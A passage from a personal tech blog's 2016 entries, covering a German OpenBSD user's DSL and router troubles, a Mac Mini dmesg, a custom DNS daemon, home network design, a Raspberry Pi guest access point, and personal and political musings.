be a great feat, but hard to do I suspect. I'll have to carefully weigh my
options.
DSL Link issues, Provider refuses to help me...
February 12th, 2016
I think it's time to switch providers. I have DSL link issues that started
on Tuesday at 17:25 PM. The Link Control Protocol on my PPPoE router complains
of lost keepalive frames and resets the connection.
Feb 12 10:29:34 gamma /bsd: pppoe0: LCP keepalive timeout
This is what my provider wrote to me (in german):
vielen Dank für Ihre E-Mail.
Die CPE weist auf ein Fremdgerät hin. Sollte dies der Fall sein,
schliessen Sie bitte die von M-net bereitgestellte Fritz!Box 3270 an
und testen die Verbindung mit diesem Endgerät.
Auf Fremdgeräte können wir leider keinen Support geben.
I'm not going to plug in that insecure old router they request from me. Plus
my internal network can't use it, it would take too much reconfiguring to put
this router on. I've ordered a new VDSL modem though in case it's my (dumb)
ADSL2 modem. This new modem allows me 100 Mbit/s which is tempting to be
gotten. I think a switch will do me good as long as I can keep all equipment
as is.
Apple is right (in this case)
February 18th, 2016
Apple has released a "letter to customer" outlining why they will fight the US government to put a back
door into IOS products. In this case they (apple) are right, and I'm proud to have
an IoS device now. It takes a large corporation with good will to stand up
to the strongest country in the world, and this time they are actually
defending freedoms! My how upside-down that sounds, usually corporations take
away freedoms and the government has to protect consumer rights. Just a sign
though that there is people in government with great powers that want to take
all of our privacy away, to know everything about us to hurt us in the end.
We have a lack of good people in government it seems.
Getting a TV after 16 years having none
February 20th, 2016
I've decided to get a TV. I also decided to change my ISP that will give
me triple play (Internet, VOIP Phone, TV over IP). All in all I'm going to
turn this around in the next month or so. Stay tuned.
Registered domain zeropager.de
February 23th, 2016
I have registered the domain zeropager.de. I did this because as a youth me
and my buddies got pagers. Back then it was the in thing to do to have a
pager as mobile phones were still too expensive to have. Public phone booths
were aplenty back then and we used to make little 3 number codes to identify
ourselves who were were, if the call was urgent or if we're inquiring where
someone is. It was pretty fun. I had a dream about paging my old friend last
night. It gave me a thought of perhaps making a SIP based paging business
where people carry a raspberry pi zero around that writes on a LED display what
people are paging them via SMS or email. Who knows perhaps it'll lead to
something cool. I'm just riding my imagination right now.
And yes since I'm a kernel programmer newbie I'm sure to hit a zeropage some
where if I was using it in hacker sense. I'm just buggy :P.
Venus broke
February 24th, 2016
My Soekris net6501 firewall broke. It's still on warranty but until then I'll be missing it
from my network. I'm in contact with the reseller regarding RMA.
New Access Point in my apartment
February 24th, 2016
I have bought and installed an ASUS EA-AC87 Wireless AC1800 access point in
place of my Fritzbox. It took some nerves to configure my repeaters to it
but now everythign is functioning. Just too bad the soekris died. I'm
monitoring the health of this wireless access point but so far so good. I
can't do test scp's to see how much faster everything is becuaes I lost the
soekris/venus and will have to wait until it's replaced.
19 days until March Equinox
March 1st, 2016
Happy March. We'll see the transition from winter to summer in this month
at least officially as a number because the equinox is officially the markation
point at which spring starts and winter ends. Can't wait!
New VDSL modem turned on
March 1st, 2016
I have turned on this new VDSL2 modem that I got the other day. Here is the
link stats from my current ADSL.
I'm slowly getting ready to get a new provider (one that offers VDSL2 with
vectoring) giving me 100 Mbit/40 Mbit. I'm just waiting for the venus soekris
board to be returned to me with whatever fixes, and then I'm initiating a
switch.
Ordered a backup Firewall
March 3rd, 2016
I have ordered a backup APU firewall. I'll keep this around in case the
one I use now breaks. Having venus break was a wakeup call for me. Basically
I can't afford to lose gamma my main firewall, or have a backup for it. I
chose the latter. I wouldn't need this if I didn't work from home, btw.
Looking in my chart logically this backup firewall will be called "delta".
After 16 years, I got a TV
March 6th, 2016
I finally got a TV after 16 years. It's a 48" Samsung and just blows my mind.
I also bought a few other things with it. Now it's almost time to save up
money again. I'm feeling really lucky though. It's great to be having money
to spend and make use of these things. Thanks to a job!
30 Years of Personal Computing History
March 6th, 2016
I have updated my chart of all computers I have ever bought (except the RPI)
that I last left in this article.
Had I an accumulated computer of all clockcycles and RAM my computer today
would be a single core 50 GHz computer with nearly 100 GB of RAM. Wow!
However I don't have all the computers anymore so it's less than that in
reality. Here is the updated chart...
Let's see a "computer generation" is 1.5 years and 4 years have passed did
3 generations after doubling each generation hold true for me?
generation 1 - 36
generation 2 - 72
generation 3 - 144
So judging by this I should be buying a 64 GB RAM machine at mid year in 2016.
(In order to stay true to Moores law...)
Sorry that's not gonna happen, I plan on keeping at a bit of a standstill
until 2020. But since this will be another generation past, I'll be
expected to get a 256 GB RAM machine or so (by 2020). Wow! I do hope I
find a use for it, but with Virtual Reality on the horizon I'm sure there
will be.
Lordy Lordy look who is Forty
March 14th, 2016
In a few days I'm turning age forty. Time really went by fast. I'll be
updating my private section of my
webpage very soon to reflect this.
Making a turn-key dns server out of DelphinusDNSD
March 19th, 2016
Freifunk Franken needed a turn-key server to convert a MAC address to an
AAAA RR via DNS, so I fleshed out (stripped out) a lot of parts from
delphinusdnsd and made it available to them (
FFFdnsd.tgz). The code to this is open source. Most of the functionality
is that I put together last night is in lookup_zone() which creates a
struct domain on the fly. There is some inefficiencies on how the code is
right now, but it works and that's the main point.
We discussed a little about buffer overflows, but I'm thinking if I introduced
anything bad in lookup_zone() then that's where to find those. The rest of
the code is identical to the delphinusdnsd code base (which also runs in
production). I'm glad to be of use with my 10 year old daemon. It's not
every day that I get a request such as this one.
Spring now...
March 21st, 2016
Well it's spring now. The equinox came and went and I didn't even blog about
it. However I did find a tweet by Dr. Neil deGrasse Tyson, that said that
because of refraction of light the equinox actually has more daylight than
night and it's not "equal day/night", but without this refraction of light
there would be exactly the same time for night and day. Anyhow I found the
tweet worth blogging about.
Very cool presentation by Agarwal
March 27th, 2016
I've been watching this guys science for a while. It intrigues me and my
dreams are shaped around the topic of photonic computers. I want to show
you the latest presentation I've seen from him:
If only I were smart enough to build me one computer such as that, but to
be truthful there is a lot of researchers worldwide trying to make this
happen, so why would I succeed? lol.
Handing down my Raspberry Pi model B
March 27th, 2016
Happy Easter. I'm handing down my RPI model B to whoever wants it,
I'd prefer giving it away to a young boy or girl at age 11+ that is
interested in computers but doesn't have the money to buy a Pi. I'd
prefer shipping it within Europe as there is no toll/customs.
The stuff cost me around 150 euros altogether (ada fruit display, rpi
model b, german power supply (5 watts) and two cases as well as an
SD card, hardly used). If you are interested send me an email.
A rare word on politics
March 27th, 2016
The European Union is always enveloped in crisis. We have the finance crisis,
the refugee crisis and the schengen crisis. I'm gonna talk about the
united europe a little bit which is rare on this blog. Europe is pretty
well off in the world picture, but our unity hurts others, mainly fringe
states, who see no way to compete with the united europe beside them. This
causes political unrest and always will cause political unrest until the
union does something about it.
Libya - I think was a mistake for NATO to get involved in. They are
worst off now than before with col. gaddaffi. My thought is that we should
finish the job and restore order by invading that country.
Syria - The islamic state is pure evil, and bombing them won't be a
solution. I say "boots on the ground" here too.
Ukraine - is a loser of being wedged between Russia and EU. We should help them economically.
Turkey - this country is interesting because it is wedged against Russia,
Iran and Turkey. They would like to join the EU but europe is not quite sure
how to deal with a semi-dictatorship which is their response to Europe not
willing to take them in. I say give them economic incentives to steer away
from this dictatorship fate.
Caliphate - is a term to name the arabic superstate, however without a
caliph (fuehrer) what would you call it? It is in europes best intentions
to break down the borders of old arabia and start building a pan-arabia with
hopefully democratic values. Think of a guy who has grown up taking his
little brother on his shoulders, both get a good perspective.
Israel - is doing pretty good so far, we need a solution about gaza and
pan-arabia.
Africa - should be given economic incentives, so that they can become the
next regional power. Desertec should be built to support europe but the energy
gained should then be reversed and flow toward Ethiopia's dams in order to
insure electricity for all of africa. If you don't understand this, please
look at a map of africa.
Russia - should be given economic incentives
So that's my current view on politics in our hemisphere. When I say boots on
ground I mean an occupation, but not just for a decade but as the model that
was done in germany with the allies. So far I'm counting 70+ years. That is
what should be done on a Libya/Syria axis to help unite Arabia with a sort
of marshall plan. Arabia (pan arabia) needs immense economic aid.
Ordered 100 Mbit Internet
March 28th, 2016
I have ordered from the Telekom in Germany the vdsl100 or magenta zuhause L.
With this I have ordered extra tv packages. As the contract that I was in
with ADSL before renewed itself for 12 months I'll also have to continue
paying the other provider until feb. 2017. Or I'll pay it in one batch which
will be better for tax writeoffs. Anyhow the day when I'm supposed to be
switched is on april 23rd or so. Wish me luck.
I waited 3 years for this moment
March 30th, 2016
OpenBSD 5.9 was released early yesterday. But I was already working to
accomodate it on my Mac Mini. Yes it's running OpenBSD now on a split-boot
called rEFInd. I waited 3 years for that moment, but I always felt that
previous versions of OpenBSD weren't ready for the mac mini. Here is a
dmesg:
rebooting.
OpenBSD 5.9 (GENERIC.MP) #0: Wed Mar 30 14:07:30 CEST 2016
pjp@earth.centroid.eu:/usr/src/sys/arch/amd64/compile/GENERIC.MP
RTC BIOS diagnostic error ab
real mem = 17063546880 (16273MB)
avail mem = 16542203904 (15775MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.4 @ 0x8ad12000 (83 entries)
bios0: vendor Apple Inc. version "censored" date 09/11/2015
bios0: Apple Inc. Macmini6,2
acpi0 at bios0: rev 2
acpi0: sleep states S0 S3 S4 S5
acpi0: tables DSDT FACP HPET APIC SBST ECDT SSDT SSDT SSDT SSDT SSDT ...
acpi0: wakeup devices P0P2(S3) EC__(S3) GMUX(S3) HDEF(S3) RP01(S3) ...
acpitimer0 at acpi0: 3579545 Hz, 24 bits
acpihpet0 at acpi0: 14318179 Hz
acpimadt0 at acpi0 addr 0xfee00000: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2295.13 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,P...
cpu0: 256KB 64b/line 8-way L2 cache
cpu0: smt 0, core 0, package 0
mtrr: Pentium Pro MTRR support, 10 var ranges, 88 fixed ranges
cpu0: apic clock running at 99MHz
cpu0: mwait min=64, max=64, C-substates=0.2.1.1.2, IBE
cpu1 at mainbus0: apid 2 (application processor)
cpu1: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu1: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT...
cpu1: 256KB 64b/line 8-way L2 cache
cpu1: smt 0, core 1, package 0
cpu2 at mainbus0: apid 4 (application processor)
cpu2: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu2: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,P...
cpu2: 256KB 64b/line 8-way L2 cache
cpu2: smt 0, core 2, package 0
cpu3 at mainbus0: apid 6 (application processor)
cpu3: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu3: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE...
cpu3: 256KB 64b/line 8-way L2 cache
cpu3: smt 0, core 3, package 0
cpu4 at mainbus0: apid 1 (application processor)
cpu4: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu4: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PA...
cpu4: 256KB 64b/line 8-way L2 cache
cpu4: smt 1, core 0, package 0
cpu5 at mainbus0: apid 3 (application processor)
cpu5: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu5: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT...
cpu5: 256KB 64b/line 8-way L2 cache
cpu5: smt 1, core 1, package 0
cpu6 at mainbus0: apid 5 (application processor)
cpu6: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu6: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,...
cpu6: 256KB 64b/line 8-way L2 cache
cpu6: smt 1, core 2, package 0
cpu7 at mainbus0: apid 7 (application processor)
cpu7: Intel(R) Core(TM) i7-3615QM CPU @ 2.30GHz, 2294.79 MHz
cpu7: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE...
cpu7: 256KB 64b/line 8-way L2 cache
cpu7: smt 1, core 3, package 0
ioapic0 at mainbus0: apid 2 pa 0xfec00000, version 20, 24 pins
ioapic0: misconfigured as apic 0, remapped to apid 2
acpiec0 at acpi0
acpimcfg0 at acpi0 addr 0xe0000000, bus 0-154
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus 4 (P0P2)
acpiprt2 at acpi0: bus 1 (RP01)
acpiprt3 at acpi0: bus 2 (RP02)
acpiprt4 at acpi0: bus 3 (RP03)
acpicpu0 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwai...
acpicpu1 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait...
acpicpu2 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait...
acpicpu3 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait...
acpicpu4 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait....
acpicpu5 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait.1...
acpicpu6 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait.1...
acpicpu7 at acpi0: C3(200@198 mwait.1@0x30), C2(500@148 mwait....
acpibtn0 at acpi0: PWRB
acpibtn1 at acpi0: SLPB
acpivideo0 at acpi0: IGPU
cpu0: Enhanced SpeedStep 2295 MHz: speeds: 2301, 2300, ...
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel Core 3G Host" rev 0x09
ppb0 at pci0 dev 1 function 0 "Intel Core 3G PCIE" rev 0x09: msi
pci1 at ppb0 bus 4
ppb1 at pci1 dev 0 function 0 "Intel DSL3510 Thunderbolt" rev 0x03
pci2 at ppb1 bus 5
ppb2 at pci2 dev 0 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci3 at ppb2 bus 6
"Intel DSL3510 Thunderbolt" rev 0x03 at pci3 dev 0 function 0 not configured
ppb3 at pci2 dev 3 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci4 at ppb3 bus 7
ppb4 at pci2 dev 4 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci5 at ppb4 bus 56
ppb5 at pci2 dev 5 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci6 at ppb5 bus 105
ppb6 at pci2 dev 6 function 0 "Intel DSL3510 Thunderbolt" rev 0x03: msi
pci7 at ppb6 bus 106
inteldrm0 at pci0 dev 2 function 0 "Intel HD Graphics 4000" rev 0x09
drm0 at inteldrm0
inteldrm0: msi
inteldrm0: 1920x1080
wsdisplay0 at inteldrm0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
xhci0 at pci0 dev 20 function 0 "Intel 7 Series xHCI" rev 0x04: msi
usb0 at xhci0: USB revision 3.0
uhub0 at usb0 "Intel xHCI root hub" rev 3.00/1.00 addr 1
"Intel 7 Series MEI" rev 0x04 at pci0 dev 22 function 0 not configured
ehci0 at pci0 dev 26 function 0 "Intel 7 Series USB" rev 0x04: apic 2 int 23
usb1 at ehci0: USB revision 2.0
uhub1 at usb1 "Intel EHCI root hub" rev 2.00/1.00 addr 1
azalia0 at pci0 dev 27 function 0 "Intel 7 Series HD Audio" rev 0x04: msi
azalia0: codecs: Cirrus Logic CS4206, Intel/0x2806, using Cirrus Logic CS4206
audio0 at azalia0
ppb7 at pci0 dev 28 function 0 "Intel 7 Series PCIE" rev 0xc4: msi
pci8 at ppb7 bus 1
bge0 at pci8 dev 0 function 0 "Broadcom BCM57766" rev 0x01,
brgphy0 at bge0 phy 1: BCM57765 10/100/1000baseT PHY, rev. 1
sdhc0 at pci8 dev 0 function 1 "Broadcom SD Host Controller" rev 0x01: apic 2 int 17
sdmmc0 at sdhc0
ppb8 at pci0 dev 28 function 1 "Intel 7 Series PCIE" rev 0xc4: msi
pci9 at ppb8 bus 2
"Broadcom BCM4331" rev 0x02 at pci9 dev 0 function 0 not configured
ppb9 at pci0 dev 28 function 2 "Intel 7 Series PCIE" rev 0xc4: msi
pci10 at ppb9 bus 3
"AT&T/Lucent FW643 1394" rev 0x08 at pci10 dev 0 function 0 not configured
ehci1 at pci0 dev 29 function 0 "Intel 7 Series USB" rev 0x04: apic 2 int 22
usb2 at ehci1: USB revision 2.0
uhub2 at usb2 "Intel EHCI root hub" rev 2.00/1.00 addr 1
pcib0 at pci0 dev 31 function 0 "Intel HM77 LPC" rev 0x04
ahci0 at pci0 dev 31 function 2 "Intel 7 Series AHCI" rev 0x04: msi, AHCI 1.3
ahci0: port 0: 3.0Gb/s
scsibus1 at ahci0: 32 targets
sd0 at scsibus1 targ 0 lun 0: SCSI3 0/direct fixed naa.5000cca6a0d00051
sd0: 953869MB, 512 bytes/sector, 1953525168 sectors
ichiic0 at pci0 dev 31 function 3 "Intel 7 Series SMBus" rev 0x04: apic 2 int 18
iic0 at ichiic0
spdmem0 at iic0 addr 0x50: 8GB DDR3 SDRAM PC3-12800 SO-DIMM
spdmem1 at iic0 addr 0x52: 8GB DDR3 SDRAM PC3-12800 SO-DIMM
isa0 at pcib0
isadma0 at isa0
com0 at isa0 port 0x3f8/8 irq 4: ns8250, no fifo
pcppi0 at isa0 port 0x61
spkr0 at pcppi0
asmc0 at isa0 port 0x300/32: rev 2.8f608, 432 keys
asmc0: read light 0 failed (0x81)
asmc0: read light 1 failed (0x81)
efifb at mainbus0 not configured
nvram: invalid checksum
uhub3 at uhub0 port 1 "Asmedia ASM107x" rev 2.10/1.00 addr 2
uvideo0 at uhub3 port 3 configuration 1 interface 0 "Logitech Webcam C310" rev 2.00/0.10 addr 3
video0 at uvideo0
uaudio0 at uhub3 port 3 configuration 1 interface 2 "Logitech Webcam C310" rev 2.00/0.10 addr 3
uaudio0: audio descriptors make no sense, error=4
ugen0 at uhub3 port 3 configuration 1 "Logitech Webcam C310" rev 2.00/0.10 addr 3
uhub4 at uhub0 port 3 "Apple, Inc. Keyboard Hub" rev 2.00/96.15 addr 4
uhidev0 at uhub4 port 2 configuration 1 interface 0 "Apple Inc. Apple Keyboard" rev 2.00/0.74 addr 5
uhidev0: iclass 3/1
ukbd0 at uhidev0: 8 variable keys, 5 key codes, country code 13
wskbd0 at ukbd0: console keyboard, using wsdisplay0
uhidev1 at uhub4 port 2 configuration 1 interface 1 "Apple Inc. Apple Keyboard" rev 2.00/0.74 addr 5
uhidev1: iclass 3/0
uhid0 at uhidev1: input=1, output=0, feature=0
uhidev2 at uhub0 port 4 configuration 1 interface 0 "PixArt USB Optical Mouse" rev 1.10/1.00 addr 6
uhidev2: iclass 3/1
ums0 at uhidev2: 3 buttons, Z dir
wsmouse0 at ums0 mux 0
uhub5 at uhub0 port 5 "Asmedia ASM107x" rev 3.00/1.00 addr 7
uhub6 at uhub1 port 1 "Intel Rate Matching Hub" rev 2.00/0.00 addr 2
uhub7 at uhub2 port 1 "Intel Rate Matching Hub" rev 2.00/0.00 addr 2
uhub8 at uhub7 port 8 "Standard Microsystems product 0x2512" rev 2.00/b.b3 addr 3
uhub9 at uhub8 port 1 "Apple Inc. BRCM20702 Hub" rev 2.00/1.00 addr 4
uhidev3 at uhub9 port 1 configuration 1 interface 0 "Apple Computer product 0x820a" rev 2.00/1.00 addr 5
uhidev3: iclass 3/1, 1 report id
ukbd1 at uhidev3 reportid 1: 8 variable keys, 6 key codes
wskbd1 at ukbd1 mux 1
wskbd1: connecting to wsdisplay0
uhidev4 at uhub9 port 2 configuration 1 interface 0 "Apple Computer product 0x820b" rev 2.00/1.00 addr 6
uhidev4: iclass 3/1, 2 report ids
ums1 at uhidev4 reportid 2: 3 buttons
wsmouse1 at ums1 mux 0
ugen1 at uhub9 port 3 "Apple Inc. Bluetooth USB Host Controller" rev 2.00/1.18 addr 7
uhidev5 at uhub8 port 2 configuration 1 interface 0 "Apple, Inc. IR Receiver" rev 2.00/1.00 addr 8
uhidev5: iclass 3/0, 38 report ids
uhid1 at uhidev5 reportid 36: input=4, output=0, feature=0
uhid2 at uhidev5 reportid 37: input=4, output=0, feature=0
uhid3 at uhidev5 reportid 38: input=4, output=0, feature=0
vscsi0 at root
scsibus2 at vscsi0: 256 targets
softraid0 at root
scsibus3 at softraid0: 256 targets
root on sd0a (b9c65093a46f0080.a) swap on sd0b dump on sd0b
clock: unknown CMOS layout
I truncated some long lines. Protected by pledge and W^X, yeah!
Registered a new domain
April 7th, 2016
I have registered dtschland.eu which spells
deutschland (germany) when you rearrange the letters. I have registered this
for 10 years at 2.99 euros per year. It was a pretty good deal.
VDSL not until February 2017
April 7th, 2016
I'm tied into a contract until February 2017 with my current provider, so I
won't switch until next year to get VDSL100, sucks I know. I've been a
customer for 5+ years with M-Net and the 24 month contract is run out however
they renew it for another year if you don't void the contract. So it'll take
until Feb 2017.
12 months of Parship
April 13th, 2016
As you may know I'm single. Finding someone nice hasn't been my priority.
So I'm trying to change that and find someone nice so I went to parship.de
and got a years membership. They aren't cheap by no means. But my train
of thought is, if I can find someone perhaps a gf or even a wife it will
pay itself off 100x to what I'm paying for this. Years ago I tried other
matchmaking services but I hope I have found the right one here. We'll
see.
Stand down! OK.
April 15th, 2016
The world is heading toward a conflict. It's time to stand down. It's time
to look back in history and try to understand why people didn't stand down in
the 1930's, and then do the the opposite they did. I shouldn't be even saying
this but the warning signs are in the red. It's time to stand down.
Doing a training session this summer
April 22nd, 2016
I have booked a training session in the ruby programming language in august
of this year. I'll be learning ruby for 4 days with an instructor. I already
know ruby but not solid so I'm going to do this. Plus it's putting my feet
in the water to more training that I hope to do. At the same time I'm going
to have my vacation then. Looking forward to it.
13,500 positions in the German Cyber Army
May 1st, 2016
The german bundeswehr is recruiting hacker talent.
While this is a staggering high number I don't think it's enough and the
approach is wrong. If you look at security, it is a chain. From the smartest
to the dumbest person. If someone can break through the defenses at the
weakest link, the entire chain collapses. That's why I think hiring talent
like is done commercially will not work. Geeks and cyber enthusiasts work
different on many levels. For one, there is no hierarchy everyone is equal to
start. People are judged by their smarts and abilities not by their rank they
might have gotten by looking pretty. So hacker culture and military hierarchy
will clash. It won't work. Pretend they want to make it the best system on
earth.
Pretend they want to build an OS that is secure for the military but
they want to keep windows systems as before. That is what I call a condom
solution, and condoms break. Ie. a firewall is a condom solution if it is
designed to protect the network traffic of a weak windows system. Let me
give you an example how that looks like in a wolf vs. the three pigs scenario.
The wolf will be stopped by a firewall which is made of brick and the pigs
are in a straw hut behind the firewall. If they happen to create a socket out
to the big bad wolfland the chances that they are going to be compromised are
high. So while the firewall sits there unknowingly the fire has burned down
the pigs hut. That's what will happen. Pretend they replace all windows with
this new military OS, chances are that the dumbest soldier will fall victim to
outside elements.
It's like the enigma machine of world war 2. Soldiers
back then had no clue how it worked, they blindly followed orders to use it.
And they didn't second-guess it. They should have. I'm saying this not
because I have nazi sentiments or that I wanted ww2 to last four years longer
than it would have if the enigma was not used, but I'm saying this because
I draw lessons out of history. What really needs to happen, if a nation is
serious about cyber warfare, is that the entire army needs to be groomed
around smarts, not muscles. But preferably both. A cyber culture needs to
take over in the military, and decisions must come from the smartest in order
to continue. In many cases the Internet is the weakest link in terms of
keeping secrets. A smart army does not engage the Internet without having the
right defensive mechanisms in place to thwart off an undermining from the
Internet. The foes of a military on the Internet can't be categorized. For
all we know they could be extraterrestrial aliens even, it's not impossible.
So where do I fit in to say these words? I never participated in cyber
warfare. But I studied some weapons of cyber warfare. Code words such as
smurf, fraggle, pepsi, land, teardrop are not foreign to me, although they
date back to the 1990's. And in some regard the Internet hasn't changed
much since the 1990's. I'm very careful with these tools, in fact if I
ever had to actively use their concepts I would build my own tools as I
distrusted the exploits posted to bugtraq (another ancient full disclosure site)
one hundred percent. Even with the author of smurf who I was close to I
disagreed with his idea of how to spoof an IP packet, but that's irrelevant now.
Now to use these concepts or to defend against them I do hope the military
wants to hire 13000 programmers and 500 scripters because what it comes down
to is programming and not scripting. It's a battle of the minds, productivity,
and I fear the bundeswehr is not ready. We'll see though. Good luck!
Considering an SSD upgrade
May 2nd, 2016
I have had SSD's for close to 6 years now. One of the earliest occurences of
me mentioning SSD's was here.
I think it's time to upgrade my capacity on 3 computers with SSD and get
appropriate hd backup storage. I'm thinking of replacing the 40 and 80 GB
SSD's in my routers to 256 GB models. The main workstation that I use..
beta.virgostar.net, would get a 1 TB SSD and a 4 TB harddrive external backup
drive. We're looking at about 500 euros in upgrades. Still considering it.
Blog's birthday
May 2nd, 2016
In 5 days is the 7th anniversary of this blog.
Here is
the first article I wrote as far as I can tell. If you've been reading my
blog for a considerable time, I thank you. It's nice to be interesting. Or
maybe you are just stopping by and found something you like? To be honest
I think the mood of the blog changed a few times, at one time I wrote both
german and english into it. I have settled on just english. This suits the
EU readers of this blog more since english is the #1 EU language for ESL
speakers. I also reported on changes to delphinusdnsd a lot, if you were
following that perhaps you found what you were looking for.
My dreamworld
May 3rd, 2016
When I dream at nights I think of the weirdest things, here is what I dream
about occasionally:
kiwi's - In my language in my dreams a kiwi is a green laser. These usually
scare the hell out of me, for reasons unknown.
escape - In my dreams I'm often trapped and what appears to be a mental
institution. I often find myself escaping.
masks - masks such as those worn in Shakespeare's Romeo and Juliet sometimes
hide the identity of my counterparts in dreams.
Computers - computers are a part in my dream but not always, subways,
streets, and institutional buildings, military facilities as well.
counting - I often miss an exit often I take the second chance to exit.
vampires - I'm often a vampire in my dreams, but with fears, anxiety and
I can't fly, I sort of float down.
presidents - george w. bush often appeared in my dreams, angela merkel and
barack obama not so much.
deja vous - I sometimes redream going to a place which later makes me
unsure if I went once or twice to that place.
sex - sometimes I dream of a pretty blonde, very seldom
Not passing down my RPI after all
May 5th, 2016
I was going to hand down my RPI to someone as told on this website but noone
was interested. So I'M going to make a guest Wifi AP out of it. The idea
I got here. I have an external display for the RPI after
all so it can display a QR code for the guest WIFI on a daily or semi-daily
basis. I had never thought of this but it's so brilliant. I'll be testing
it with my ipod which does have QR scanner afaik. The AP will reside beside
my other AP and be plugged into it. I'll probably VLAN it though to the
router which will firewall it away from the rest of my network. It truely
will be a guest access point. Brilliant!
RPI Guest AP done, but not for 2.4 GHz
May 7th, 2016
Well the idea below I turned it around and it works. The AP is supposed to
reboot at 4AM with a new password for the WIFI. However, the 2.4 GHz
spectrum is used too much around here. So I'm steering clear of it all and
using the 5 GHz spectrum, but for that I had to order a new wifi dongle. It'll
be here by wednesday next week. What a neat project. Thanks Heise.de!
One router too many? The add-up.
May 7th, 2016
I have a unique home network. This is why I react allergic to people who want
to force a router on me. Another device? And all the topological changes I
have to do to my network! Here is a rundown of my devices:
hallway - dumb ADSL bridge modem
hallway - APU router
hallway - NUC Core i3
hallway - ASUS 5 GHz AP
hallway - raspberry pi guest access point
office - Lanner router
office - computer 1
office - macintosh mini (computer 2)
office - house phone
office - work phone
office - fritz repeater
livingroom - fritz repeater
livingroom - soekris router
livingroom - samsung tv
livingroom - apple tv
livingroom - fritzbox lte router
livingroom - freifunk router
Now you may think that some of these can be consolidated into less devices
but there is a problem. I need a firewall between play and work for one,
that's the lanner router. It seperates the office from the rest of the
networks. Where a lot of people who just have a 192.168.178.0/24 network
behind a fritzbox, my network goes deep. I think 3-4 hops deep between
opposite points. I count on routing and not switching. Also re-routing it all
through the hallway to the lte router requires one script on the APU to be
run, which sets new routes out the fritzbox lte router. Highly complex!
I solved this with a vxlan(4) which is layer 2 ethernet over layer 4 UDP.
There is a bit of fragmentation in the wlan because of it but that's on the
main wlan.
Now it goes on to say that without an OS such as OpenBSD I couldn't
even do these network tricks such as vxlan, gif tunnel, ipsec over wlan to
protect phone traffic from the already encrypted wifi. Since wlan is
breakable with effort an ike'd ipsec will keep prying eyes out at first.
Since the computers sleep when I'm away or sleeping there is a bit of
vampire power flowing to keep the RAM in S4 state. But the routers stay
on 24/7. The most these consume I think is 20 watts, which will hopefully
be halfed in 4 years when I'll be looking for replacements. In 2020 the
Lanner for example will be 10 years old and will be retired.
I'm very happy about my network I have. But adding another fritzbox for
example would ruin the entire setup. This is why I hate what we germans
call "zwangsrouter" and I look sceptically at proposals to get routers
certified. How will this help me at all, when most consumer routers are
trash to begin with, security wise or functionality wise? Thanks for
reading.
Europeans love English!
May 10th, 2016
The stats are that there is more ESL speakers in Europe than there is people
who speak german. Europeans love English. With Britain before a referendum
the EU may have to refocus it's transition language to german. This is why
we all need Great Britain in the EU, to prevent that from happening. We love
english in Germany even. More than half of our music played publically is
english in some form. But there is more german music these days than there
was say 30 years ago due to the emergence of german rap. I can't stand it
although the producers make a good beat. We love english and it's not so
good without the english speaking countries, as long as you don't come to
germany to talk about your dreams of naked men on the S-Bahn. We can
decipher such blasphemy! :-)
Stoererhaftung has been eliminated in Germany
May 12th, 2016
I wrote
about this
last october. Finally the politicians reacted. I also signed a few petitions
against this, which helped. We finally are able to share our Wifi with others
and legally. This makes a lot of things a lot easier. Finally a human should
have several gateways instead of just one. The elimination of the
stoererhaftung will help with that.
The need for a mesh network
May 12th, 2016
Imagine if everyone has a hotspot whether freifunk or other on their router
at home. This will create a landscape of doors into the Internet. But they
aren't meshed, meaning there is no inter-door activity. This is because the
hotspot has no concept of networking with other hotspots. You can see this
if an entire outdoor dslam (those boxes the telecom puts up) has a power
failure. An entire neighbourhood will be affected and no Internet.
The solution is to create a mesh. Meshed hotspots talk to each other. They
will bridge distances of 10+ hotspots if necessary to find a gateway that is
available. They are smart in the protocols they speak. We need this in
Germany which is a leading technology country. What we need is an open
standard by which these hotspots can talk to one another. Freifunk has a
